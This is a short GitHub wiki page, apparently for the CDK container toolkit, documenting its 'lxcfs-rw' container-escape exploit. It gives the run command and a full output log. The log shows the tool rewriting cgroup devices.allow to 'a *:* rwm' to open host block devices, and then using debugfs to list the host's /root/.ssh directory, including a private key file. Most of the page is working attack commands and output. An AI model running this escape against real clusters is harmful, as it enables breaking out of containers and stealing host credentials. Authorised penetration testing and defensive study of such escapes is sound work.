-
Notifications
You must be signed in to change notification settings - Fork 551
Exploit: lxcfs rw
neargle edited this page Aug 26, 2021
·
2 revisions
Escape container when root has LXCFS read & write privilege.
当POD挂载了LXCFS目录包含CGOURP目录,并且对CGROUP有写权限。
./cdk run lxcfs-rw
./cdk run lxcfs-rw
root@lxcfs-rw:/tmp# ./cdk run lxcfs-rw
2021/01/28 09:25:21 found pod devices.allow path: /kubepods/burstable/pod561ee143-4468-443a-9940-f262a9417ae5/ef6edb3c483591aaa28923df6de84d1fedb9372890c4441fd0e31ed4972237b1
2021/01/28 09:25:21 found host blockDeviceId Marjor: 252 Minor: 1
2021/01/28 09:25:21 found rw lxcfs mountpoint: /data/test/lxcfs
2021/01/28 09:25:22 set all block device accessible success.
2021/01/28 09:25:22 devices.allow content: a *:* rwm
2021/01/28 09:25:22 exploit success, run "debugfs -w host_dev".
root@lxcfs-rw:/tmp# debugfs -w host_dev
debugfs 1.44.5 (15-Dec-2018)
debugfs: ls /root/.ssh
393231 (12) . 52566 (12) .. 395870 (24) authorized_keys
395829 (16) config 395860 (20) known_hosts 393227 (16) id_rsa
395831 (3996) id_rsa.pub